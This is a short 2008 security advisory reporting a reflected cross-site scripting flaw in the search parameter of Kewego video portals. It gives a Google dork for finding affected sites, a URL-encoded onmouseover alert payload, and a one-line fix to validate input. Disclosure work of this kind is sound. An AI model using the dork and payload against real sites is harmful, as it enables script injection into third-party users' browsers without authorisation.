+==========================================================================================+
+                 Copyright  2008   - Kewego &  Cross-site scripting (XSS)                 +
+==========================================================================================+



Author(s): Ivan Sanchez 

Product:Kewego 


Web:http:http://www.kewego.es/

Versions: All Version and all Kewego's domains on the net.(WebPortal- Webcast)and other sites.


Date: 04/10/2008


Kewego is a video platform provider website. The company is based in Paris, France.
Kewego operates over 160 video platforms for a range of clients in sectors such as TV Broadcast, Newspaper and Magazine publishing and Web Sites.
Clients include well-known brands such as Orange, Ebay, Lycos, M6, and L'Equipe.
Kewego also operates its own branded video sharing sites such as www.mykewego.com, www.mykewego.co.uk, www.mykewego.fr and so on.


GOOGLE DORKS:
------------

intext:"Copyright 2008 kewego "



Parameters Affected:
-------------------


Exploit it from Querystring.


http://sites-Kew...../search/?q=  <insert there XSS code>



Example,insert this insane code:


test%20%22%20onmouseover=%22alert(null)%22



Remediation: Validate the User Input. 
------------



            NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================================+
+                 Copyright  2008   - Kewego &  Cross-site scripting (XSS)                 +
+==========================================================================================+